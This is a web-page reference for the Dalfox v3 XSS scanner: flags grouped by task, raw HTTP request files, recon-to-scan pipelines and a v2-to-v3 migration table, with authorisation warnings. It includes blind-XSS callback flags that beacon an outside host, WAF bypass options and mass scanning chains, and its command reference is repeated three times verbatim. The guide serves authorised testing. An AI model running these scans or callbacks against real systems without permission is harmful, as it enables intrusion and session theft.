dalfox is the XSS scanner I reach for first. It is fast, scriptable, and reads from stdin which makes it slot cleanly into a recon pipeline. This is the field reference for the flags that matter, grouped by the task I am trying to accomplish.
Heads-up on v3. Dalfox v3.0.0 (released 2026-05-25) is a complete Rust rewrite. The Go v2 codebase is preserved on the v2 branchurl, file, pipe, sxss, and server subcommands are gone. v3 has four subcommands (scan, server, payload, mcp) and scan auto-detects the input shape (URL, file, stdin, raw HTTP). Every example below uses the v3 surface.
If you are new to Dalfox, the Dalfox tutorial walking through an attack against a vulnerable app is the right next stop. If you are comparing tools, the best XSS tools list for 2026 covers the alternatives. For the underlying mechanics, the cross-site scripting deep dive has the full taxonomy, with separate writeups on reflected XSS and DOM-based XSS .
Authorisation required
Use these techniques only on systems you own or have written authorisation to test. Unauthorised access to a computer system is a crime in nearly every jurisdiction (US: Computer Fraud and Abuse Act. UK: Computer Misuse Act 1990. EU: Directive 2013/40/EU). This article assumes a sanctioned engagement or a lab environment you control. If you do not have permission, do not run these commands against anything you find on the internet.
Dalfox v3 Command Reference Every flag organised by task. Copy and adapt.
Target specification (v3: everything is `dalfox scan`) dalfox scan 'https://target.example/q?s=test'Single URL. Auto-detected as URL input. Tests every query parameter unless --param restricts.
dalfox scan urls.txtFile input. One URL per line. Auto-detected when the argument is a readable file.
cat urls.txt | dalfox scanPipe input. Auto-detected when stdin is piped. The mode you will use most in pipelines (kxss, gau, waybackurls).
dalfox scan -i raw-http req.txtRaw HTTP request file. v3 selects mode via `-i raw-http`; the file holds method, headers, cookies, body.
dalfox scan url --sxss --sxss-url 'https://target.example/view'Stored XSS. v3 replaces v2's `sxss` subcommand with `--sxss` plus `--sxss-url` on a regular scan.
dalfox serverREST API server (separate subcommand). Default port 6664, bound to 127.0.0.1.
-X POSTHTTP method override. Default GET.
-d 'username=foo&password=bar'Request body. Pair with `-X POST` if the captured request is POST.
-p 'name:query'Restrict to specific parameter. v3 supports a `name:location` form; locations are query, body, json, cookie, header.
--ignore-param 'csrf_token,_token'Skip anti-CSRF noise parameters.
Detection tuning --workers 50Concurrent workers per target. Default 50 in v3.
--delay 200Milliseconds between requests. Default 0. Use against rate-limited or fragile targets.
--timeout 10Per-request timeout in seconds. Default 10. Does not bound total scan time.
--scan-timeout 600Hard wall-clock cap per target for the scan stage, in seconds. 0 disables (the default). Use it on partially-hung endpoints.
--skip-discoverySkip all discovery; only test the parameters explicitly present in the URL.
--skip-miningSkip all parameter mining (dict + DOM).
--skip-mining-dictSkip dictionary-based parameter mining only.
--skip-mining-domSkip DOM-based parameter mining only.
--skip-xss-scanningRun only discovery, no XSS payloads. Useful for inventory.
--only-discoveryStop after discovery. Inverse intent to `--skip-xss-scanning`.
--skip-ast-analysisSkip AST-based DOM-XSS analysis. Faster but loses sink detection on JS-heavy pages.
Parameter mining and discovery -W words.txtMining dictionary wordlist file (`--mining-dict-word`). v3 short form `-W`.
--remote-wordlists 'burp,assetnote'Pull mining wordlists from named remote sources.
--remote-payloads 'portswigger,payloadbox'Pull payloads from the named remote sources. Adds variety beyond the built-ins.
-H 'X-Forwarded-For: 127.0.0.1'Add custom header (repeatable). Dalfox also probes for header-injection points.
--cookies 'session=abc'Add cookies (repeatable). Separate from `-H Cookie:`.
--skip-reflection-headerSkip header-based reflection checks.
--skip-reflection-cookieSkip cookie-based reflection checks.
--skip-reflection-pathSkip path-based reflection checks.
Payload and reflection control --custom-payload payloads.txtAppend your own payloads to the built-in set. One per line.
--only-custom-payloadUse ONLY the custom payload file. Disables the built-in payloads entirely.
--custom-alert-value 1337Replace the default alert value (1). Helps disambiguate findings in shared labs.
--custom-alert-type strAlert value type. `none` (default) or `str`.
--encoders 'url,html'Comma-separated encoders. Default `url,html`. Short form `-e`.
--inject-marker FUZZReplace this token in the URL/body with payloads. Useful when the injection point is non-standard.
--ignore-return '302,403,404'HTTP status codes to skip. Cuts false positives on hard-fail endpoints.
--follow-redirectsFollow 3xx redirects (`-F`). Default off.
--hppHTTP Parameter Pollution mode. Submits duplicate params to test the back-end's pick.
--deep-scanKeep testing additional payloads after first finding. Slower, better coverage.
Blind XSS -b 'https://xss.example/c/abcd'Blind XSS callback URL. Every payload also fires a script that beacons this endpoint.
-b 'https://your.interactsh-server.com'interactsh as the blind listener. The standard pairing for OOB XSS.
--custom-blind-xss-payload tpl.htmlCustom blind payload template file (v3). Use it to ship a richer callback than the default beacon.
--skip-xss-scanning -b 'https://...'Stored/blind-only run: skip reflection probing, only fire blind payloads against the input.
Stored XSS (replaces v2 `sxss` subcommand) --sxssEnable Stored XSS mode on a `scan` run.
--sxss-url 'https://target.example/view'Retrieval URL. Dalfox sends payloads to the target, then checks for reflection here.
--sxss-method GETRetrieval method. Default GET.
--sxss-retries 3How many times to retry the retrieval URL when fetching stored output. Default 3.
Auth, cookies, proxy --cookies 'session=abc'Send cookies (repeatable). Required for any authenticated endpoint.
--cookie-from-raw cookies.txtLoad cookies from a raw HTTP request file.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than packing auth into a request file.
--user-agent 'Mozilla/5.0 ...'Override default UA. The Dalfox default is signatured by some WAFs.
--proxy 'http://127.0.0.1:8080'Route through a proxy. `http://` and `socks5://` both supported.
Output and reporting -o results.txtWrite output to a file (`--output`). Format depends on `--format`.
-f jsonOutput format (`--format`). Default `plain`. Other options: `jsonl`, `markdown`, `sarif`, `toml`.
-f jsonlJSON Lines. One finding per line. Best for streaming into a pipeline.
--silenceSuppress banner and progress; only emit findings (`-S`). Required for clean pipeline output.
--no-colorDisable ANSI colour. Use when piping to a file or another tool.
--include-requestInclude the HTTP request in the output per finding.
--include-responseInclude the response body in the output per finding.
--include-allShorthand for both include flags.
--poc-type curlRender PoC as. `plain` (default), `curl`, `httpie`, or `http-request`.
--stream-findingsEmit each finding the moment it is verified (plain format only).
--dry-runDiscover and plan without sending payloads. Useful for scope confirmation.
Pipeline patterns kxss < urls.txt | dalfox scan --silencePre-filter with kxss (reflection check), then scan only the reflecting endpoints. Saves hours on large scopes.
gau target.example | dalfox scan --silencePull historical URLs from gau (Wayback, Common Crawl, OTX), pipe straight into Dalfox.
waybackurls target.example | dalfox scan --silenceSame idea, waybackurls source.
subfinder -d target.example | httpx -silent | gau | dalfox scan --silenceFull recon-to-XSS chain in one line. Subdomains, live hosts, historical URLs, then scan.
katana -u target.example -silent | dalfox scan --silenceLive-crawled URLs from katana into Dalfox. Better coverage of modern SPAs than Wayback alone.
WAF, scope, evasion --waf-bypass autoWAF handling. `auto` (default), `force`, or `off`.
--waf-evasionAuto-throttle on WAF detection (workers=1, delay=3000ms). First knob to turn when a target is filtering naive payloads.
--waf-min-confidence 0.3Drop WAF fingerprints below this confidence. Default 0.3 suppresses weak matches. 1.0 keeps only high-confidence hits.
--skip-waf-probeSkip active WAF fingerprinting. Useful when you have already classified the target.
--force-waf cloudflareForce a named WAF profile when `--waf-bypass force` is set.
--include-url 'https?://target\.example/.*'Regex scope: only scan URLs matching this pattern.
--exclude-url '/logout|/api/internal'Regex scope: never scan URLs matching this pattern.
--out-of-scope-file oos.txtWildcard domain patterns to skip, one per line.
--max-concurrent-targets 50Global concurrent targets. Default 50.
--max-targets-per-host 100Per-host cap. Default 100.
Debug, payload, mcp, update --debugVerbose debug output (global flag). Use when a finding looks wrong or the scan terminates early.
dalfox payload event-handlersPrint built-in payload collection: event-handlers, useful-tags, uri-scheme, portswigger, payloadbox.
dalfox mcpRun as a Model Context Protocol stdio server. For integration into agentic toolchains.
--limit 50 --only-poc vCap results shown. `--only-poc` filter accepts `v`, `r`, `a` (verified, reflected, all).
--max-payloads-per-param 100Cap payloads tested per parameter. 0 (default) means no cap.
-VPrint version (`--version`). Worth pinning in CI so reports are auditable.
Target specification (v3: everything is `dalfox scan`) dalfox scan 'https://target.example/q?s=test'Single URL. Auto-detected as URL input. Tests every query parameter unless --param restricts.
dalfox scan urls.txtFile input. One URL per line. Auto-detected when the argument is a readable file.
cat urls.txt | dalfox scanPipe input. Auto-detected when stdin is piped. The mode you will use most in pipelines (kxss, gau, waybackurls).
dalfox scan -i raw-http req.txtRaw HTTP request file. v3 selects mode via `-i raw-http`; the file holds method, headers, cookies, body.
dalfox scan url --sxss --sxss-url 'https://target.example/view'Stored XSS. v3 replaces v2's `sxss` subcommand with `--sxss` plus `--sxss-url` on a regular scan.
dalfox serverREST API server (separate subcommand). Default port 6664, bound to 127.0.0.1.
-X POSTHTTP method override. Default GET.
-d 'username=foo&password=bar'Request body. Pair with `-X POST` if the captured request is POST.
-p 'name:query'Restrict to specific parameter. v3 supports a `name:location` form; locations are query, body, json, cookie, header.
--ignore-param 'csrf_token,_token'Skip anti-CSRF noise parameters.
Parameter mining and discovery -W words.txtMining dictionary wordlist file (`--mining-dict-word`). v3 short form `-W`.
--remote-wordlists 'burp,assetnote'Pull mining wordlists from named remote sources.
--remote-payloads 'portswigger,payloadbox'Pull payloads from the named remote sources. Adds variety beyond the built-ins.
-H 'X-Forwarded-For: 127.0.0.1'Add custom header (repeatable). Dalfox also probes for header-injection points.
--cookies 'session=abc'Add cookies (repeatable). Separate from `-H Cookie:`.
--skip-reflection-headerSkip header-based reflection checks.
--skip-reflection-cookieSkip cookie-based reflection checks.
--skip-reflection-pathSkip path-based reflection checks.
Blind XSS -b 'https://xss.example/c/abcd'Blind XSS callback URL. Every payload also fires a script that beacons this endpoint.
-b 'https://your.interactsh-server.com'interactsh as the blind listener. The standard pairing for OOB XSS.
--custom-blind-xss-payload tpl.htmlCustom blind payload template file (v3). Use it to ship a richer callback than the default beacon.
--skip-xss-scanning -b 'https://...'Stored/blind-only run: skip reflection probing, only fire blind payloads against the input.
Auth, cookies, proxy --cookies 'session=abc'Send cookies (repeatable). Required for any authenticated endpoint.
--cookie-from-raw cookies.txtLoad cookies from a raw HTTP request file.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than packing auth into a request file.
--user-agent 'Mozilla/5.0 ...'Override default UA. The Dalfox default is signatured by some WAFs.
--proxy 'http://127.0.0.1:8080'Route through a proxy. `http://` and `socks5://` both supported.
Pipeline patterns kxss < urls.txt | dalfox scan --silencePre-filter with kxss (reflection check), then scan only the reflecting endpoints. Saves hours on large scopes.
gau target.example | dalfox scan --silencePull historical URLs from gau (Wayback, Common Crawl, OTX), pipe straight into Dalfox.
waybackurls target.example | dalfox scan --silenceSame idea, waybackurls source.
subfinder -d target.example | httpx -silent | gau | dalfox scan --silenceFull recon-to-XSS chain in one line. Subdomains, live hosts, historical URLs, then scan.
katana -u target.example -silent | dalfox scan --silenceLive-crawled URLs from katana into Dalfox. Better coverage of modern SPAs than Wayback alone.
WAF, scope, evasion --waf-bypass autoWAF handling. `auto` (default), `force`, or `off`.
--waf-evasionAuto-throttle on WAF detection (workers=1, delay=3000ms). First knob to turn when a target is filtering naive payloads.
--waf-min-confidence 0.3Drop WAF fingerprints below this confidence. Default 0.3 suppresses weak matches. 1.0 keeps only high-confidence hits.
--skip-waf-probeSkip active WAF fingerprinting. Useful when you have already classified the target.
--force-waf cloudflareForce a named WAF profile when `--waf-bypass force` is set.
--include-url 'https?://target\.example/.*'Regex scope: only scan URLs matching this pattern.
--exclude-url '/logout|/api/internal'Regex scope: never scan URLs matching this pattern.
--out-of-scope-file oos.txtWildcard domain patterns to skip, one per line.
--max-concurrent-targets 50Global concurrent targets. Default 50.
--max-targets-per-host 100Per-host cap. Default 100.
Detection tuning --workers 50Concurrent workers per target. Default 50 in v3.
--delay 200Milliseconds between requests. Default 0. Use against rate-limited or fragile targets.
--timeout 10Per-request timeout in seconds. Default 10. Does not bound total scan time.
--scan-timeout 600Hard wall-clock cap per target for the scan stage, in seconds. 0 disables (the default). Use it on partially-hung endpoints.
--skip-discoverySkip all discovery; only test the parameters explicitly present in the URL.
--skip-miningSkip all parameter mining (dict + DOM).
--skip-mining-dictSkip dictionary-based parameter mining only.
--skip-mining-domSkip DOM-based parameter mining only.
--skip-xss-scanningRun only discovery, no XSS payloads. Useful for inventory.
--only-discoveryStop after discovery. Inverse intent to `--skip-xss-scanning`.
--skip-ast-analysisSkip AST-based DOM-XSS analysis. Faster but loses sink detection on JS-heavy pages.
Payload and reflection control --custom-payload payloads.txtAppend your own payloads to the built-in set. One per line.
--only-custom-payloadUse ONLY the custom payload file. Disables the built-in payloads entirely.
--custom-alert-value 1337Replace the default alert value (1). Helps disambiguate findings in shared labs.
--custom-alert-type strAlert value type. `none` (default) or `str`.
--encoders 'url,html'Comma-separated encoders. Default `url,html`. Short form `-e`.
--inject-marker FUZZReplace this token in the URL/body with payloads. Useful when the injection point is non-standard.
--ignore-return '302,403,404'HTTP status codes to skip. Cuts false positives on hard-fail endpoints.
--follow-redirectsFollow 3xx redirects (`-F`). Default off.
--hppHTTP Parameter Pollution mode. Submits duplicate params to test the back-end's pick.
--deep-scanKeep testing additional payloads after first finding. Slower, better coverage.
Stored XSS (replaces v2 `sxss` subcommand) --sxssEnable Stored XSS mode on a `scan` run.
--sxss-url 'https://target.example/view'Retrieval URL. Dalfox sends payloads to the target, then checks for reflection here.
--sxss-method GETRetrieval method. Default GET.
--sxss-retries 3How many times to retry the retrieval URL when fetching stored output. Default 3.
Output and reporting -o results.txtWrite output to a file (`--output`). Format depends on `--format`.
-f jsonOutput format (`--format`). Default `plain`. Other options: `jsonl`, `markdown`, `sarif`, `toml`.
-f jsonlJSON Lines. One finding per line. Best for streaming into a pipeline.
--silenceSuppress banner and progress; only emit findings (`-S`). Required for clean pipeline output.
--no-colorDisable ANSI colour. Use when piping to a file or another tool.
--include-requestInclude the HTTP request in the output per finding.
--include-responseInclude the response body in the output per finding.
--include-allShorthand for both include flags.
--poc-type curlRender PoC as. `plain` (default), `curl`, `httpie`, or `http-request`.
--stream-findingsEmit each finding the moment it is verified (plain format only).
--dry-runDiscover and plan without sending payloads. Useful for scope confirmation.
Debug, payload, mcp, update --debugVerbose debug output (global flag). Use when a finding looks wrong or the scan terminates early.
dalfox payload event-handlersPrint built-in payload collection: event-handlers, useful-tags, uri-scheme, portswigger, payloadbox.
dalfox mcpRun as a Model Context Protocol stdio server. For integration into agentic toolchains.
--limit 50 --only-poc vCap results shown. `--only-poc` filter accepts `v`, `r`, `a` (verified, reflected, all).
--max-payloads-per-param 100Cap payloads tested per parameter. 0 (default) means no cap.
-VPrint version (`--version`). Worth pinning in CI so reports are auditable.
Target specification (v3: everything is `dalfox scan`) dalfox scan 'https://target.example/q?s=test'Single URL. Auto-detected as URL input. Tests every query parameter unless --param restricts.
dalfox scan urls.txtFile input. One URL per line. Auto-detected when the argument is a readable file.
cat urls.txt | dalfox scanPipe input. Auto-detected when stdin is piped. The mode you will use most in pipelines (kxss, gau, waybackurls).
dalfox scan -i raw-http req.txtRaw HTTP request file. v3 selects mode via `-i raw-http`; the file holds method, headers, cookies, body.
dalfox scan url --sxss --sxss-url 'https://target.example/view'Stored XSS. v3 replaces v2's `sxss` subcommand with `--sxss` plus `--sxss-url` on a regular scan.
dalfox serverREST API server (separate subcommand). Default port 6664, bound to 127.0.0.1.
-X POSTHTTP method override. Default GET.
-d 'username=foo&password=bar'Request body. Pair with `-X POST` if the captured request is POST.
-p 'name:query'Restrict to specific parameter. v3 supports a `name:location` form; locations are query, body, json, cookie, header.
--ignore-param 'csrf_token,_token'Skip anti-CSRF noise parameters.
Parameter mining and discovery -W words.txtMining dictionary wordlist file (`--mining-dict-word`). v3 short form `-W`.
--remote-wordlists 'burp,assetnote'Pull mining wordlists from named remote sources.
--remote-payloads 'portswigger,payloadbox'Pull payloads from the named remote sources. Adds variety beyond the built-ins.
-H 'X-Forwarded-For: 127.0.0.1'Add custom header (repeatable). Dalfox also probes for header-injection points.
--cookies 'session=abc'Add cookies (repeatable). Separate from `-H Cookie:`.
--skip-reflection-headerSkip header-based reflection checks.
--skip-reflection-cookieSkip cookie-based reflection checks.
--skip-reflection-pathSkip path-based reflection checks.
Blind XSS -b 'https://xss.example/c/abcd'Blind XSS callback URL. Every payload also fires a script that beacons this endpoint.
-b 'https://your.interactsh-server.com'interactsh as the blind listener. The standard pairing for OOB XSS.
--custom-blind-xss-payload tpl.htmlCustom blind payload template file (v3). Use it to ship a richer callback than the default beacon.
--skip-xss-scanning -b 'https://...'Stored/blind-only run: skip reflection probing, only fire blind payloads against the input.
Auth, cookies, proxy --cookies 'session=abc'Send cookies (repeatable). Required for any authenticated endpoint.
--cookie-from-raw cookies.txtLoad cookies from a raw HTTP request file.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than packing auth into a request file.
--user-agent 'Mozilla/5.0 ...'Override default UA. The Dalfox default is signatured by some WAFs.
--proxy 'http://127.0.0.1:8080'Route through a proxy. `http://` and `socks5://` both supported.
Pipeline patterns kxss < urls.txt | dalfox scan --silencePre-filter with kxss (reflection check), then scan only the reflecting endpoints. Saves hours on large scopes.
gau target.example | dalfox scan --silencePull historical URLs from gau (Wayback, Common Crawl, OTX), pipe straight into Dalfox.
waybackurls target.example | dalfox scan --silenceSame idea, waybackurls source.
subfinder -d target.example | httpx -silent | gau | dalfox scan --silenceFull recon-to-XSS chain in one line. Subdomains, live hosts, historical URLs, then scan.
katana -u target.example -silent | dalfox scan --silenceLive-crawled URLs from katana into Dalfox. Better coverage of modern SPAs than Wayback alone.
WAF, scope, evasion --waf-bypass autoWAF handling. `auto` (default), `force`, or `off`.
--waf-evasionAuto-throttle on WAF detection (workers=1, delay=3000ms). First knob to turn when a target is filtering naive payloads.
--waf-min-confidence 0.3Drop WAF fingerprints below this confidence. Default 0.3 suppresses weak matches. 1.0 keeps only high-confidence hits.
--skip-waf-probeSkip active WAF fingerprinting. Useful when you have already classified the target.
--force-waf cloudflareForce a named WAF profile when `--waf-bypass force` is set.
--include-url 'https?://target\.example/.*'Regex scope: only scan URLs matching this pattern.
--exclude-url '/logout|/api/internal'Regex scope: never scan URLs matching this pattern.
--out-of-scope-file oos.txtWildcard domain patterns to skip, one per line.
--max-concurrent-targets 50Global concurrent targets. Default 50.
--max-targets-per-host 100Per-host cap. Default 100.
Detection tuning --workers 50Concurrent workers per target. Default 50 in v3.
--delay 200Milliseconds between requests. Default 0. Use against rate-limited or fragile targets.
--timeout 10Per-request timeout in seconds. Default 10. Does not bound total scan time.
--scan-timeout 600Hard wall-clock cap per target for the scan stage, in seconds. 0 disables (the default). Use it on partially-hung endpoints.
--skip-discoverySkip all discovery; only test the parameters explicitly present in the URL.
--skip-miningSkip all parameter mining (dict + DOM).
--skip-mining-dictSkip dictionary-based parameter mining only.
--skip-mining-domSkip DOM-based parameter mining only.
--skip-xss-scanningRun only discovery, no XSS payloads. Useful for inventory.
--only-discoveryStop after discovery. Inverse intent to `--skip-xss-scanning`.
--skip-ast-analysisSkip AST-based DOM-XSS analysis. Faster but loses sink detection on JS-heavy pages.
Payload and reflection control --custom-payload payloads.txtAppend your own payloads to the built-in set. One per line.
--only-custom-payloadUse ONLY the custom payload file. Disables the built-in payloads entirely.
--custom-alert-value 1337Replace the default alert value (1). Helps disambiguate findings in shared labs.
--custom-alert-type strAlert value type. `none` (default) or `str`.
--encoders 'url,html'Comma-separated encoders. Default `url,html`. Short form `-e`.
--inject-marker FUZZReplace this token in the URL/body with payloads. Useful when the injection point is non-standard.
--ignore-return '302,403,404'HTTP status codes to skip. Cuts false positives on hard-fail endpoints.
--follow-redirectsFollow 3xx redirects (`-F`). Default off.
--hppHTTP Parameter Pollution mode. Submits duplicate params to test the back-end's pick.
--deep-scanKeep testing additional payloads after first finding. Slower, better coverage.
Stored XSS (replaces v2 `sxss` subcommand) --sxssEnable Stored XSS mode on a `scan` run.
--sxss-url 'https://target.example/view'Retrieval URL. Dalfox sends payloads to the target, then checks for reflection here.
--sxss-method GETRetrieval method. Default GET.
--sxss-retries 3How many times to retry the retrieval URL when fetching stored output. Default 3.
Output and reporting -o results.txtWrite output to a file (`--output`). Format depends on `--format`.
-f jsonOutput format (`--format`). Default `plain`. Other options: `jsonl`, `markdown`, `sarif`, `toml`.
-f jsonlJSON Lines. One finding per line. Best for streaming into a pipeline.
--silenceSuppress banner and progress; only emit findings (`-S`). Required for clean pipeline output.
--no-colorDisable ANSI colour. Use when piping to a file or another tool.
--include-requestInclude the HTTP request in the output per finding.
--include-responseInclude the response body in the output per finding.
--include-allShorthand for both include flags.
--poc-type curlRender PoC as. `plain` (default), `curl`, `httpie`, or `http-request`.
--stream-findingsEmit each finding the moment it is verified (plain format only).
--dry-runDiscover and plan without sending payloads. Useful for scope confirmation.
Debug, payload, mcp, update --debugVerbose debug output (global flag). Use when a finding looks wrong or the scan terminates early.
dalfox payload event-handlersPrint built-in payload collection: event-handlers, useful-tags, uri-scheme, portswigger, payloadbox.
dalfox mcpRun as a Model Context Protocol stdio server. For integration into agentic toolchains.
--limit 50 --only-poc vCap results shown. `--only-poc` filter accepts `v`, `r`, `a` (verified, reflected, all).
--max-payloads-per-param 100Cap payloads tested per parameter. 0 (default) means no cap.
-VPrint version (`--version`). Worth pinning in CI so reports are auditable.
req.txt is a raw HTTP request: method line, headers, blank line, body. When the endpoint needs auth, custom headers, or a non-trivial POST body, -i raw-http req.txt is faster than packing every flag manually. Here is what it actually looks like:
GET /search?q=test HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiJ9...; PHPSESSID=q9k2...
Connection: close
POST requests look the same with the method and body added:
POST /comment HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=q9k2...
Connection: close
body=hello&author=me
Dalfox tests every parameter it finds in the request unless you restrict with --param. No special markers required.
Open DevTools (F12 on Windows/Linux, Cmd+Option+I on macOS), Network tab, enable Preserve log .
Trigger the target request in the page.
Right-click the request, Copy as cURL . Paste into a converter (curlconverter --language http <command> from npm) to get raw HTTP, or hand-translate: -H "Foo: bar" becomes a header line, --data 'x=y' becomes the body.
Save as req.txt. Use with dalfox scan -i raw-http req.txt in every example below.
A few command lines I use as starting points and adapt from.
Reset Tune the common flags once. Every command below reads from this. Out-of-range values get a red border. The Googlebot UA usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers.
Simplest possible probe , just a URL with a query string. Good for a first sanity check:
dalfox scan ':target_url' --workers :workers --delay :delay --timeout :timeout --user-agent ':ua'POST request with form data , no req.txt needed:
dalfox scan 'https://target.example/comment' \
-X POST -d 'body=hello&author=me' \
--workers :workers --delay :delay --user-agent ':ua'Captured request, light touch , see if anything reflects:
dalfox scan -i raw-http req.txt --workers :workers --delay :delay --timeout :timeoutAuthenticated, scoped to specific parameters :
dalfox scan -i raw-http req.txt -p 'q:query' -p ' filter:query' \
--workers :workers --delay :delay \
--skip-mining --user-agent ':ua'Behind a WAF, slow and quiet :
dalfox scan -i raw-http req.txt --workers 5 --delay 500 --waf-evasion \
--custom-payload evasion.txt --user-agent ':ua'Blind XSS run with an interactsh callback :
dalfox scan -i raw-http req.txt -b ':blind' \
--workers :workers --delay :delay --user-agent ':ua'The pipeline I use most , kxss as a reflection pre-filter so Dalfox only spends payload budget on endpoints that actually echo input:
echo target.example | gau | kxss | awk '{print $NF}' \ | dalfox scan --silence -f jsonl -o findings.jsonl Full recon chain from a single root domain to confirmed XSS, end to end:
subfinder -d target.example -silent \ | httpx -silent \ | katana -silent \ | dalfox scan --silence -f jsonl -o findings.jsonl Stored XSS workflow : send payloads to the profile endpoint, check for reflection on the public view page (v3 replaces dalfox sxss with --sxss):
dalfox scan 'https://target.example/profile/edit' \
--sxss --sxss-url 'https://target.example/profile/view' \
--cookies 'session=abc' \
--workers :workers --delay :delay--silence and -f jsonl are the two flags that matter most for pipeline use. Without them, banner noise and progress spinners corrupt the output stream.
If you have v2 muscle memory, the most common substitutions:
v2 v3 dalfox url URLdalfox scan URLdalfox file urls.txtdalfox scan urls.txtdalfox pipedalfox scan (stdin auto-detected)dalfox sxss URL --trigger Tdalfox scan URL --sxss --sxss-url T-r req.txt-i raw-http req.txt-w 100--workers 100-C 'cookie'--cookies 'cookie'--method=POST-X POST--format=json-f json--skip-mining-all--skip-mining--skip-bav(removed; BAV is no longer a separate scan stage in v3) --mining-dict-word=w.txt-W w.txt
--config (the TOML/JSON config file) if you only scan ad-hoc targets. Useful when the same scope reappears weekly.--include-request --include-response in fast scans; the output balloons quickly. Enable only when triaging a specific finding.--only-discovery on its own; --skip-xss-scanning reads more clearly to anyone else reading the run script.
Every flag above is dual use. The same blind callback that catches an admin's session in your bug bounty target is the one I run against my own lab apps weekly. Use these against systems you own or are explicitly authorised to test. See the legal-framing notes in the cross-site scripting deep dive .
What changed between Dalfox v2 and v3?
Does Dalfox find DOM-based XSS or only reflected XSS?
How do I integrate Dalfox with blind XSS infrastructure?
Why does Dalfox miss an XSS I found manually?
